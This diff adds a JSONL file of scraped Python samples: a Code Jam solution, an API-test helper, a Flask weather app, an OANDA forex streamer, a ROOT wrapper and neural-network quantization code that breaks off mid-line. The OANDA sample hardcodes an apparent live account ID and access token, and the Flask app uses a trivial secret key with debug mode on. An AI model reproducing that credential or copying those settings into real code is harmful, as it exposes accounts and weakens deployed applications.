diff --git "a/3809.jsonl" "b/3809.jsonl" new file mode 100644--- /dev/null +++ "b/3809.jsonl" @@ -0,0 +1,677 @@ +{"seq_id":"135852086","text":"#!/usr/bin/python\n\nimport sys\n\n\nif __name__ == '__main__':\n\n fname = sys.argv[-1]\n with open(fname, 'r') as f:\n lines = [l[:-1] for l in f.readlines()]\n\n outlines = []\n\n for i, line in enumerate(lines[1:]):\n N = int(line)\n if N == 0:\n o = 'INSOMNIA'\n else:\n digits = [False for _ in xrange(10)]\n k = 1\n while True:\n for d in str(k * N):\n digits[int(d)] = True\n if all(digits):\n break\n k += 1\n o = k * N\n\n outlines.append('Case #%s: %s' % (i + 1, o))\n\n fname = fname[:-2] + 'out'\n with open(fname, 'w') as f:\n f.write('\\n'.join(outlines))\n","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_jbcdefg_sheep.py","file_name":"16_0_1_jbcdefg_sheep.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"203696189","text":"#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport json\nimport re\nimport xlrd\n\n\nclass Common(object):\n\n @staticmethod\n def api_read_data1(page_name, data_address):\n \"\"\" 获取excel数据,并转化成dict\n\n \"\"\"\n excel_data = {}\n _name = []\n book = xlrd.open_workbook(data_address)\n sheet = book.sheet_by_name(page_name)\n num = sheet.nrows\n for row in range(1, num):\n test_name = sheet.cell(row, 0).value\n _name.append(test_name)\n re_way = sheet.cell(row, 2).value\n address_data = sheet.cell(row, 3).value\n parameter_data = sheet.cell(row, 4).value\n result_parameter = sheet.cell(row, 5).value\n draw_parameter = sheet.cell(row, 6).value\n result_data = sheet.cell(row, 7).value\n col = 1\n try:\n re_way = json.loads(re_way)\n col += 1\n address_data = json.loads(address_data)\n col += 1\n parameter_data = json.loads(parameter_data)\n col += 1\n result_parameter = json.loads(result_parameter)\n col += 1\n draw_parameter = json.loads(draw_parameter)\n col += 1\n result_data = json.loads(result_data)\n col += 1\n except Exception as e:\n print('excel第{}行,第{}列,json数据解析失败'.format(row+1, col))\n raise e\n result_data.update(re_way)\n result_data.update(address_data)\n result_data.update(result_parameter)\n result_data.update(draw_parameter)\n result_data.update(parameter_data)\n excel_data[test_name] = result_data\n excel_data['_name'] = _name\n return excel_data\n\n @staticmethod\n def _token(result):\n \"\"\" 递归字典数据,查找出深层中键为token的值\n \n \"\"\"\n if isinstance(result, list):\n for n in result:\n return Common._token(n)\n else:\n for n in result:\n if n == 'token':\n return result[n]\n else:\n if isinstance(result[n], list):\n for n1 in result[n]:\n if not Common._token(n1):\n continue\n else:\n return Common._token(n1)\n elif isinstance(result[n], dict):\n if not Common._token(result[n]):\n continue\n else:\n return Common._token(result[n])\n\n @staticmethod\n def get_token(result):\n \"\"\" 两种方式获取token,第一种返回数据没有的话,就从cookies.items中获取\n\n \"\"\"\n one = Common._token(result.json())\n if one:\n return one\n else:\n for n in result.cookies.items():\n if isinstance(n, tuple):\n n = list(n)\n for n1 in n:\n if n1.find('token') != -1:\n return re.findall(r'\\w+\\.?\\w', n1.split('token:')[1])[0]\n else:\n assert '两种方式都获取不到token'\n\n\nif __name__ == '_main_':\n pass","sub_path":"core/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"504284173","text":"#!/usr/bin/env python3\n\nimport requests\nfrom flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config[\"SQLCHEMY_TRACK_MODIFICATIONS\"] = False\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///weather.db\"\napp.config[\"SECRET_KEY\"] = \"secret\"\ndb = SQLAlchemy(app)\n\nclass City(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(35), nullable=False)\n\ndef getCityHelper(city):\n url= f\"http://api.openweathermap.org/data/2.5/weather?q={city}&units=imperial&appid={apiid}\"\n r = requests.get(url).json()\n return r \n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef indexGet():\n cities = City.query.all()\n weatherLst = []\n for city in cities:\n r = getCityHelper(city.name)\n stat = {\n \"city\" : city.name,\n \"temperature\" : r[\"main\"][\"temp\"],\n \"description\" : r[\"weather\"][0][\"description\"],\n \"feelslike\" : r[\"main\"][\"feels_like\"],\n \"icon\" : r[\"weather\"][0][\"icon\"]\n }\n weatherLst.insert(0, stat)\n return render_template(\"index.html\", weatherLst=weatherLst)\n\n@app.route(\"/\", methods=[\"POST\"])\ndef indexPost():\n errMsg = \"\"\n newCity = request.form.get(\"city\")\n s = \"\"\n for char in newCity.split(\" \"):\n s += char.capitalize()\n s += \" \"\n if s != \"\":\n existingCity = City.query.filter_by(name=s).first()\n if not existingCity:\n data = getCityHelper(s)\n if data[\"cod\"] == 200:\n newCityDB = City(name=s)\n db.session.add(newCityDB)\n db.session.commit()\n else:\n errMsg = f\"{s} does not exist! Try again\"\n else:\n errMsg = f\"{s} added already!\"\n if errMsg == \"\":\n flash(f\"{s} added successfully!\")\n else:\n flash(errMsg, \"error\")\n return redirect(url_for(\"indexGet\"))\n\n\n@app.route(\"/delete/\")\ndef deleteCity(name):\n city = City.query.filter_by(name=name).first()\n db.session.delete(city)\n db.session.commit()\n flash(f\"Successfully deleted {city.name}\", \"success\")\n return redirect(url_for(\"indexGet\"))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"278151947","text":"import pandas as pd\n\ndef genhead(title):\n return '\\n\\n\\n'+title+'\\n'\n\ndef genbar(width, height, file_name):\n temp = \"\"\n temp += '\\n'\n temp +=''\n temp +='\\n'\n temp +='\\n'\n temp += '\\n'\n return temp\n\ndef csvtojson(file_name):\n df = pd.read_csv(file_name)\n #print df[\"colour\"]\n nodelist = []\n jsondata = {}\n jsondata[\"nodes\"] = []\n jsondata[\"links\"] = []\n for i in range(0,2):\n # print df[\"destination\"][i]\n if df[\"source\"][i] not in nodelist:\n nodelist.append(df[\"source\"][i])\n if df[\"destination\"][i] not in nodelist:\n nodelist.append(df[\"destination\"][i])\n for i in range(len(nodelist)):\n jsondata[\"nodes\"].append({\n \"name\":nodelist[i],\n \"colour\": df[\"colour\"][0],\n \"size\": 5\n })\n # to add \"colour\": df[\"colour\"][0],\n\n for i in range(len(df[\"destination\"])):\n jsondata[\"links\"].append({\n \"source\": nodelist.index(df[\"source\"][i]),\n \"target\": nodelist.index(df[\"destination\"][i]),\n \"value\": 5\n })\n return jsondata\n\ndef genforced_layout(width, height, file_name, stroke_width):\n temp = \"\"\n temp += '\\n'\n temp += '\\n'\n temp += ' \\n'\n\n temp += ' '\n temp += ''\n temp += ''\n return temp\n","sub_path":"graphmod.py","file_name":"graphmod.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"387897067","text":"import requests\nimport json\nimport queue\nimport pandas as pd\nimport oandapyV20\nimport oandapyV20.endpoints.pricing as pricing\nfrom event import TickEvent\nimport threading\n\nclass StreamingForexPrices(object):\n put_event = threading.Event()\n\n def __init__(self, access_token, account_id, instruments, events):\n self.access_token = access_token\n self.account_id = account_id\n self.instruments = instruments\n self.events = events\n\n def connect_to_stream(self):\n try:\n client = oandapyV20.API(access_token=self.access_token)\n params = {'instruments':self.instruments}\n req = pricing.PricingInfo(accountID=self.account_id, params=params)\n return req\n except Exception as e:\n errmsg = 'Caught exception when connecting to stream\\n' + str(e)\n rq.terminate(errmsg)\n\n def stream_to_queue(self):\n client = None\n req = None\n try:\n client = oandapyV20.API(access_token=self.access_token)\n params = {'instruments':self.instruments}\n req = pricing.PricingInfo(accountID=self.account_id, params=params)\n except Exception as e:\n errmsg = 'Caught exception when connecting to stream\\n' + str(e)\n rq.terminate(errmsg)\n\n res = client.request(req)\n with open(\"history_stream.txt\", \"a\") as file:\n file.write(\"@streming\\tinit on ready\\n\")\n while(True):\n if StreamingForexPrices.put_event.is_set():\n res = client.request(req)\n tick = res['prices'][0]\n instrument = tick['instrument']\n time = pd.Timestamp(tick['time'])\n bid = tick['bids'][0]['price']\n ask = tick['asks'][0]['price']\n tev = TickEvent(instrument, time, bid, ask)\n self.events.put(tev)\n self.clear_tick_event()\n with open(\"history_stream.txt\", \"a\") as file:\n file.write(\"--- put --->\\n\")\n with open(\"history_stream.txt\", \"a\") as file:\n file.write(\"@Streaming\\t{} {} (B:{}, A:{})\\n\".format(tev.time,tev.instrument,tev.bid,tev.ask))\n\n def set_tick_event(self):\n StreamingForexPrices.put_event.set()\n def clear_tick_event(self):\n StreamingForexPrices.put_event.clear()\n\nif False:\n events = queue.Queue()\n ACCOUNT_ID = '101-001-6187232-001'\n ACCESS_TOKEN = '451faa1c762459cae6c1dcd3d46d673d-78b5fcfbee57f4ad6846c325d9d69cb4'\n sfp = StreamingForexPrices(ACCESS_TOKEN, ACCOUNT_ID, 'EUR_USD', events)\n sfp.stream_to_queue()\n","sub_path":"Lib/myfx2/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"20866118","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/broot/RootWrap.py\n# Compiled at: 2015-06-03 11:26:20\n# Size of source mod 2**32: 2640 bytes\n__doc__ = 'Module to wrap the RootOutput C++ class\\n\\n 2015 Bart Pelssers\\n GPL v2.0\\n'\nimport os\nfrom ctypes import cdll, c_void_p\nsource_dir = os.path.dirname(os.path.abspath(__file__))\nlib = cdll.LoadLibrary(source_dir + '/lib/libRootOutput.so')\n\nclass RootOutput(object):\n \"\"\"RootOutput\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n self.type_convert = {'a': 'C', 'int8': 'B', \n 'uint8': 'b', \n 'int16': 'S', \n 'uint16': 's', \n 'int32': 'I', \n 'uint32': 'i', \n 'float32': 'F', \n 'foat64': 'D', \n 'int64': 'L', \n 'uint64': 'l', \n 'bool': 'O'}\n self.obj = lib.RootOutput_new()\n\n def create_new_file(self, name):\n \"\"\"Create a new TFile with name\"\"\"\n lib.RootOutput_create_new_output(self.obj, name.encode('utf-8'))\n\n def shutdown(self):\n \"\"\"Close TFile\"\"\"\n lib.RootOutput_close_output(self.obj)\n\n def write_all_objects(self):\n \"\"\"Write all objects in memory to TFile\n (Objects being the defined Trees and Branches)\n \"\"\"\n lib.RootOutput_write_all_objects(self.obj)\n\n def create_new_tree(self, name):\n \"\"\"Create a new TTree with name\"\"\"\n lib.RootOutput_create_new_tree(self.obj, name.encode('utf-8'))\n\n def create_new_branch(self, tree_name, branch_name, buffer):\n \"\"\"Create new branch with branch_name for certain tree_name.\n buffer should be a numpy ndarray of a supported branch type.\n \"\"\"\n sdtype = str(buffer.dtype)\n if sdtype.startswith('|S') or sdtype.startswith('S'):\n branch_type = 'C'\n else:\n if sdtype in self.type_convert.keys():\n branch_type = self.type_convert[sdtype]\n else:\n raise KeyError()\n return\n lib.RootOutput_create_new_branch(self.obj, tree_name.encode('utf-8'), branch_name.encode('utf-8'), branch_type.encode('utf-8'), c_void_p(buffer.ctypes.data), buffer.size)\n\n def tree_fill(self, tree_name):\n \"\"\"Fill TTree tree_name with a new entry for each buffer\"\"\"\n lib.RootOutput_tree_fill(self.obj, tree_name.encode('utf-8'))","sub_path":"pycfiles/bropdf1-1.0-py3-none-any/RootWrap.cpython-34.py","file_name":"RootWrap.cpython-34.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"532470809","text":"import time\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom scipy.sparse import csr_matrix\nfrom tensorflow.keras.callbacks import EarlyStopping, LearningRateScheduler, TensorBoard, ModelCheckpoint\nfrom tensorflow.keras.layers import InputSpec, Flatten, Dense, Conv2D, BatchNormalization, MaxPooling2D, Activation\nfrom tensorflow.keras.regularizers import l2\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.losses import squared_hinge, mean_squared_error\nfrom tensorflow.keras import backend as K\nimport tensorflow._api.v2.compat as tv\nfrom keras.utils.vis_utils import plot_model\nfrom contextlib import redirect_stdout\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import MinMaxScaler\n\n# tv.disable_v2_behavior()\ntv.v1.disable_v2_behavior()\nfrom tensorflow.keras.models import Sequential\nfrom matplotlib import pyplot as plt\nfrom tensorflow.keras import constraints\nfrom tensorflow.keras import initializers\nfrom artap.problem import Problem\n\n'''\n paper: Deep Compression: Compressing Deep Neural Networks with Pruning, Trained Quantization and Huffman Coding.\n url : https://arxiv.org/abs/1510.00149\n The goal is to compress the neural network using weights quantization with no loss of accuracy.\n'''\n\n\nclass LayerTrain(object):\n\n def __init__(self, in_depth, out_depth, N_clusters, name):\n self.clusters_masks = []\n self.name = name\n if 'conv' in name:\n self.w = tf.Variable(tf.random.normal([5, 5, in_depth, out_depth], stddev=0.1))\n\n elif 'fc' in name:\n self.w = tf.Variable(tf.random.normal([in_depth, out_depth], stddev=0.1))\n\n self.w_PH = tv.v1.placeholder(tf.float32, self.w.shape)\n self.assign_w = tv.v1.assign(self.w, self.w_PH)\n self.num_total_weights = np.prod(self.w.shape)\n\n # mask placeholder for pruning\n # ones - valid weights, zero - pruned weights\n self.pruning_mask_data = np.ones(self.w.shape, dtype=np.float32)\n self.N_clusters = N_clusters # for quantization\n\n def forward(self, x):\n if 'conv' in self.name:\n return tf.nn.conv2d(x, self.w, strides=[1, 2, 2, 1], padding='SAME')\n\n elif 'fc' in self.name:\n return tf.matmul(x, self.w)\n\n def save_weights_histogram(self, sess, directory, iteration):\n w_data = sess.run(self.w).reshape(-1)\n valid_w_data = [x for x in w_data if x != 0.0]\n\n plt.grid(True)\n plt.hist(valid_w_data, 100, color='0.4')\n plt.gca().set_xlim([-0.4, 0.4])\n plt.savefig(directory + '/' + self.name + '-' + str(iteration), dpi=100)\n plt.gcf().clear()\n\n def save_weights(self, sess, directory):\n\n w_data = sess.run(self.w)\n np.save(directory + '/' + self.name + '-weights', w_data)\n np.save(directory + '/' + self.name + '-prune-mask', self.pruning_mask_data)\n\n # quantization\n def quantize_weights(self, sess):\n global distances\n w_data = sess.run(self.w)\n # theoretically pruning mask should be taken into consideration to compute max and min data only among valid\n # weights but in practice with normal ditribution init there is 100% chances that min and max vals will be\n # among valid weights\n max_val = np.max(w_data)\n min_val = np.min(w_data)\n\n # linearly initialize centroids between max and min\n self.centroids = np.linspace(min_val, max_val, self.N_clusters)\n w_data = np.expand_dims(w_data, 0)\n centroids_prev = np.copy(self.centroids)\n for i in range(20):\n if 'conv' in self.name:\n distances = np.abs(w_data - np.reshape(self.centroids, (-1, 1, 1, 1, 1)))\n distances = np.transpose(distances, (1, 2, 3, 4, 0))\n\n elif 'fc' in self.name:\n distances = np.abs(w_data - np.reshape(self.centroids, (-1, 1, 1)))\n distances = np.transpose(distances, (1, 2, 0))\n\n classes = np.argmin(distances, axis=-1)\n for i in range(self.N_clusters):\n cluster_mask = (classes == i).astype(np.float32) * self.pruning_mask_data\n self.clusters_masks.append(cluster_mask)\n\n num_weights_assigned = np.sum(cluster_mask)\n if num_weights_assigned != 0:\n self.centroids[i] = np.sum(cluster_mask * w_data) / num_weights_assigned\n else: # do not modify\n pass\n if np.array_equal(centroids_prev, self.centroids):\n break\n\n centroids_prev = np.copy(self.centroids)\n\n self.quantize_weights_update(sess)\n\n def group_and_reduce_gradient(self, grad):\n grad_out = np.zeros(self.w.shape, dtype=np.float32)\n for i in range(self.N_clusters):\n cluster_mask = self.clusters_masks[i]\n centroid_grad = np.sum(grad * cluster_mask)\n\n grad_out = grad_out + cluster_mask * centroid_grad\n\n return grad_out\n\n # for numerical stability\n def quantize_centroids_update(self, sess):\n w_data = sess.run(self.w)\n for i in range(self.N_clusters):\n cluster_mask = self.clusters_masks[i]\n cluster_count = np.sum(cluster_mask)\n if cluster_count != 0:\n self.centroids[i] = np.sum(cluster_mask * w_data) / cluster_count\n else: # do not modify\n pass\n\n # for numerical stability\n def quantize_weights_update(self, sess):\n w_data_updated = np.zeros(self.w.shape, dtype=np.float32)\n for i in range(self.N_clusters):\n cluster_mask = self.clusters_masks[i]\n centroid = self.centroids[i]\n\n w_data_updated = w_data_updated + cluster_mask * centroid\n sess.run(self.assign_w, feed_dict={self.w_PH: self.pruning_mask_data * w_data_updated})\n\n\nclass DenseLayer(object):\n def __init__(self, matrix, prune_mask, name, dense=False):\n assert matrix.shape == prune_mask.shape\n\n self.dense = dense\n self.N_in, self.N_out = matrix.shape\n\n if not self.dense:\n indices, values, dense_shape = [], [], [self.N_in, self.N_out] # sparse matrix representation\n for i in range(self.N_in):\n for j in range(self.N_out):\n\n # pruning mask: ones - valid weights, zero - pruned weights\n if prune_mask[i][j] == 0.0:\n continue\n\n indices.append([i, j])\n values.append(matrix[i][j])\n self.w_matrix = tf.SparseTensor(indices, values, dense_shape) # tf sparse matrix\n else:\n self.w_matrix = tf.constant(matrix * prune_mask) # tf dense matrix\n\n def forward(self, x):\n\n if not self.dense:\n w = tf.sparse.transpose(self.w_matrix, (1, 0))\n x = tf.transpose(x, (1, 0))\n x = tf.sparse.sparse_dense_matmul(w, x) # only left matrix can be sparse hence transpositions\n x = tf.transpose(x, (1, 0))\n else:\n x = tf.matmul(x, self.w_matrix)\n return x\n\n\nclass ConvLayer(object):\n\n def __init__(self, tensor, prune_mask, H_in, W_in, stride, name, dense=False):\n\n assert tensor.shape == prune_mask.shape\n\n self.stride = stride\n self.dense = dense\n\n if self.dense == False:\n indices, values, dense_shape = self.tensor_to_matrix(tensor, prune_mask, H_in, W_in, stride)\n dense_shape[1] = int(round(dense_shape[1]))\n self.w_matrix = tf.SparseTensor(indices, values, dense_shape) # tf sparse matrix\n\n else:\n matrix = self.tensor_to_matrix(tensor, prune_mask, H_in, W_in, stride)\n self.w_matrix = tf.constant(matrix) # tf dense matrix\n\n self.w_tensor = tf.constant(tensor * prune_mask)\n\n print('layer:', name)\n print('\\tvalid matrix weights:', int(np.sum(prune_mask)))\n print('\\ttotal tensor weights:', np.product(self.w_tensor.shape))\n print('\\ttotal matrix weights:', np.product(self.w_matrix.shape))\n\n def get_linear_pos(self, i, j, W): # row major\n\n return i * W + j\n\n def tensor_to_matrix(self, tensor, prune_mask, H_in, W_in, stride):\n\n # assume padding type 'SAME' and padding value 0\n\n H_out = int(int(H_in + 1) / stride) # padding 'SAME'\n W_out = int(int(W_in + 1) / stride) # padding 'SAME'\n H_in = int(H_in)\n W_in = int(W_in)\n\n kH, kW, D_in, D_out = tensor.shape\n\n self.D_out = D_out\n self.H_out = H_out\n self.W_out = W_out\n\n if self.dense == False:\n indices, values, dense_shape = [], [], [H_in * W_in * D_in, H_out * W_out * D_out] # sparse matrix\n else:\n matrix = np.zeros((H_in * W_in * D_in, H_out * W_out * D_out), dtype=np.float32) # dense matrix\n\n for d_in in range(D_in):\n for d_out in range(D_out):\n\n # tf.nn.conv2d implementation doesn't go from top-left spatial location but from bottom-right\n for i_in_center in np.arange(H_in - 1, -1, -stride): # kernel input center for first axis\n for j_in_center in np.arange(W_in - 1, -1, -stride): # kernel input center for second axis\n\n i_out = int(i_in_center / stride)\n j_out = int(j_in_center / stride)\n\n for i in range(kH):\n\n i_in = int(i_in_center + i - kH / 2)\n\n if i_in < 0 or i_in >= H_in: # padding value 0\n continue\n\n for j in range(kW):\n\n j_in = int(j_in_center + j - kW / 2)\n\n if j_in < 0 or j_in >= W_in: # padding value 0\n continue\n\n # pruning mask: ones - valid weights, zero - pruned weights\n if prune_mask[i][j][d_in][d_out] == 0.0:\n continue\n\n pos_in = int(self.get_linear_pos(i_in, j_in, W_in) + d_in * H_in * W_in)\n pos_out = int(self.get_linear_pos(i_out, j_out, W_out) + d_out * H_out * W_out)\n\n if self.dense == False:\n indices.append([pos_in, pos_out])\n values.append(tensor[i][j][d_in][d_out])\n else:\n matrix[pos_in][pos_out] = tensor[i][j][d_in][d_out]\n\n if self.dense == False:\n return indices, values, dense_shape\n else:\n return matrix\n\n def forward_matmul_preprocess(self, x):\n\n x = tf.transpose(x, (0, 3, 1, 2))\n x = tf.reshape(x, (-1, np.product(x.shape[1:])))\n\n return x\n\n def forward_matmul_postprocess(self, x):\n\n x = tf.reshape(x, [-1, self.D_out, int(self.H_out), int(self.W_out)])\n x = tf.transpose(x, (0, 2, 3, 1))\n\n return x\n\n def forward_matmul(self, x):\n\n if self.dense == False:\n w = tf.sparse.transpose(self.w_matrix, (1, 0))\n x = tf.transpose(x, (1, 0))\n x = tf.sparse.sparse_dense_matmul(w, x) # only left matrix can be sparse hence transpositions\n x = tf.transpose(x, (1, 0))\n else:\n x = tf.matmul(x, self.w_matrix)\n\n return x\n\n def forward_conv(self, x):\n\n return tf.nn.conv2d(x, self.w_tensor, strides=[1, self.stride, self.stride, 1], padding='SAME')\n\n\nclass NNModel:\n def __init__(self, problem: Problem, name, weights, prune_mask):\n self.problem = problem\n self.name = name\n self.weights = weights\n self.prune_mask = prune_mask\n\n def build_model(self, weights, prune_mask):\n x_PH = tv.v1.placeholder(tf.float32, [None, 28, 28, 1])\n\n model = Sequential()\n layer1 = model.add(ConvLayer(weights, prune_mask, x_PH.shape[1], x_PH.shape[2], 2, 'conv1'))\n x = model.add(layer1.forward_matmul_preprocess(x_PH))\n x = model.add(tf.nn.relu(layer1.forward_matmul(x)))\n x = model.add(layer1.forward_matmul_postprocess(x))\n\n layer2 = model.add(ConvLayer(weights, prune_mask, x.shape[1], x.shape[2], 2, 'conv2'))\n x = model.add(layer2.forward_matmul_preprocess(x))\n x = model.add(tf.nn.relu(layer2.forward_matmul(x)))\n x = model.add(layer2.forward_matmul_postprocess(x))\n\n x = tf.reshape(x, [-1, 7 * 7 * 64])\n\n layer3 = model.add(DenseLayer(weights, prune_mask, 'fc1'))\n x = model.add(tf.nn.relu(layer3.forward(x)))\n\n layer4 = model.add(DenseLayer(weights, prune_mask, 'fc2'))\n logits = model.add(layer4.forward(x))\n\n labels = tv.v1.placeholder(tf.float32, [None, 10])\n correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n return model, accuracy\n\n\n'''\n class for quantization of Optimizers\n \n url : https://arxiv.org/pdf/1711.00215.pdf\n paper: Minimum Energy Quantized Neural Networks\n \n url : https://arxiv.org/pdf/1602.02830.pdf\n paper: Binarized Neural Networks: Training Neural Networks with Weights and Activations Constrained to +1 or −1\n'''\n\n\nclass Quantized_optimizers:\n\n def __init__(self):\n pass\n\n def round_opt(self, x):\n rounded = K.round(x)\n rounded_opt = x + K.stop_gradient(rounded - x)\n\n return rounded_opt\n\n def clip_opt(self, x, min, max):\n clipped = K.clip(x, min, max)\n return x + K.stop_gradient(clipped - x)\n\n def hard_sigmoid(self, x):\n result = K.clip((x + 1) / 2, 0, 1)\n return result\n\n def quantized_relu(self, W, nb=16):\n nb_bits = nb\n Wq = K.clip(2. * (Quantized_optimizers.round_opt(self, Quantized_optimizers.hard_sigmoid(self, W) *\n pow(2, nb_bits)) / pow(2, nb_bits)) - 1., 0,\n 1 - 1.0 / pow(2, nb_bits - 1))\n return Wq\n\n def quantized_tanh(self, W, nb=16):\n non_sign_bits = nb - 1\n m = pow(2, non_sign_bits)\n Wq = K.clip(Quantized_optimizers.round_opt(self, W * m), -m, m - 1) / m\n\n return Wq\n\n def quantized_leakyrelu(self, W, nb=16, alpha=0.1):\n global negative_part\n if alpha != 0:\n negative_part = tf.nn.relu(-W)\n W = tf.nn.relu(W)\n if alpha != 0:\n alpha = tf.cast(tf.convert_to_tensor(alpha), W.dtype.base_dtype)\n W -= alpha * negative_part\n non_sign_bits = nb - 1\n m = pow(2, non_sign_bits)\n Wq = K.clip(Quantized_optimizers.round_opt(self, W * m), -m, m - 1) / m\n\n return Wq\n\n def quantize(self, W, nb=16, clip_through=False):\n non_sign_bits = nb - 1\n m = pow(2, non_sign_bits)\n if clip_through:\n Wq = self.clip_opt(Quantized_optimizers.round_opt(self, W * m), -m, m - 1) / m\n else:\n Wq = K.clip(Quantized_optimizers.round_opt(self, W * m), -m, m - 1) / m\n\n return Wq\n\n # def mean_abs(self, x, axis=None, keepdims=False):\n # return K.stop_gradient(K.mean(K.abs(x), axis=axis, keepdims=keepdims))\n #\n # def Xnorize(self, W, H=1, axis=None, keepdims=False):\n # Wb = self.quantize(W, H)\n # Wa = self.mean_abs(W, axis, keepdims)\n\n\nclass Clip(constraints.Constraint):\n def __init__(self, min_value, max_value=None):\n self.min = min_value\n self.max = max_value\n if not self.max:\n self.max = -self.min\n if self.min > self.max:\n self.min = self.max\n self.max = self.min\n\n def __call__(self, p):\n return K.clip(p, self.min, self.max)\n\n\n'''\n class for quantization of Dense Layer\n \n url : https://arxiv.org/pdf/1711.00215.pdf\n paper: Minimum Energy Quantized Neural Networks\n \n url : https://arxiv.org/pdf/1602.02830.pdf\n paper: Binarized Neural Networks: Training Neural Networks with Weights and Activations Constrained to +1 or −1\n'''\n\n\nclass DenseQuantized(Dense):\n \"\"\"\n Layer weight initializers : 'glorot_uniform'\n The neural network needs to start with some weights and then iteratively update them to better values.\n The term kernel_initializer is a fancy term for which statistical distribution or function to use for\n initialising the weights.\n \"\"\"\n\n def __init__(self, units, H=1.0, nb=16, kernel_multiplier='glorot_uniform', bias_multiplier=None, **kwargs):\n super(DenseQuantized, self).__init__(units, **kwargs)\n self.H = H\n self.nb = nb\n self.kernel_multiplier = kernel_multiplier\n self.bias_multiplier = bias_multiplier\n super(DenseQuantized, self).__init__(units, **kwargs)\n\n def build(self, input_shape):\n input_dim = int(input_shape[1])\n if self.H == 'glorot_unifrom':\n self.H = np.float32(np.sqrt(1.5 / (input_dim + self.units)))\n if self.kernel_multiplier == 'glorot_uniform':\n self.kernel_multiplier = np.float32(1. / np.sqrt(1.5 / (input_dim + self.units)))\n # self.kernel_multiplier = np.float32(1. / np.sqrt(1.5 / (nb_input + nb_output)))\n\n self.kernel_constraint = Clip(-self.H, self.H)\n self.kernel_initializer = initializers.RandomUniform(-self.H, self.H)\n self.kernel = self.add_weight(shape=(input_dim, self.units),\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint)\n if self.use_bias:\n self.lr_multipliers = [self.kernel_multiplier, self.bias_multiplier]\n self.bias = self.add_weight(shape=(self.units,),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n else:\n self.lr_multipliers = [self.kernel_multiplier]\n self.bias = None\n\n \"\"\"\n Specifies the rank, dtype and shape of every input to a layer.\n\n Layers can expose (if appropriate) an `input_spec` attribute:\n an instance of `InputSpec`, or a nested structure of `InputSpec` instances\n (one per input tensor). These objects enable the layer to run input\n compatibility checks for input structure, input rank, input shape, and\n input dtype.\n\n A None entry in a shape is compatible with any dimension,\n a None shape is compatible with any shape.\n \"\"\"\n self.input_spec = InputSpec(min_ndim=input_dim)\n self.built = True\n\n def call(self, inputs):\n quantized_kernel = Quantized_optimizers.quantize(self, self.kernel, nb=self.nb)\n output = K.dot(inputs, quantized_kernel)\n if self.use_bias:\n output = K.bias_add(output, self.bias)\n if self.activation is not None:\n output = self.activation(output)\n\n return output\n\n\n'''\n class for quantization of Convolution Layer\n \n url : https://arxiv.org/pdf/1711.00215.pdf\n paper: Minimum Energy Quantized Neural Networks\n \n url : https://arxiv.org/pdf/1602.02830.pdf\n paper: Binarized Neural Networks: Training Neural Networks with Weights and Activations Constrained to +1 or −1.\n'''\n\n\nclass ConvQuantized(Conv2D):\n \"\"\"\n Layer weight initializers : 'glorot_uniform'\n The neural network needs to start with some weights and then iteratively update them to better values.\n The term kernel_initializer is a fancy term for which statistical distribution or function to use for\n initialising the weights.\n \"\"\"\n\n def __init__(self, filters, kernel_regularizer=None, activity_regularizer=None, kernel_multiplier='glorot_uniform',\n bias_multiplier=None, H=1.0, nb=16, **kwargs):\n super(ConvQuantized, self).__init__(filters, **kwargs)\n self.H = H\n self.nb = nb\n self.kernel_multiplier = kernel_multiplier\n self.bias_multiplier = bias_multiplier\n self.activity_regularizer = activity_regularizer\n self.kernel_regularizer = kernel_regularizer\n\n def build(self, input_shape):\n\n input_dim = input_shape[-1]\n kernel_shape = self.kernel_size + (input_dim, self.filters)\n\n base = self.kernel_size[0] * self.kernel_size[1]\n if self.H == 'glorot_uniform':\n nb_input = int(input_dim * base)\n nb_output = int(self.filters * base)\n self.H = np.float32(np.sqrt(1.5 / (nb_input + nb_output)))\n\n if self.kernel_multiplier == 'glorot_uniform':\n nb_input = int(input_dim * base)\n nb_output = int(self.filters * base)\n self.kernel_multiplier = np.float32(1. / np.sqrt(1.5 / (nb_input + nb_output)))\n\n self.kernel_constraint = Clip(-self.H, self.H)\n self.kernel_initializer = initializers.RandomUniform(-self.H, self.H)\n self.kernel = self.add_weight(shape=kernel_shape,\n initializer=self.kernel_initializer,\n name='kernel',\n 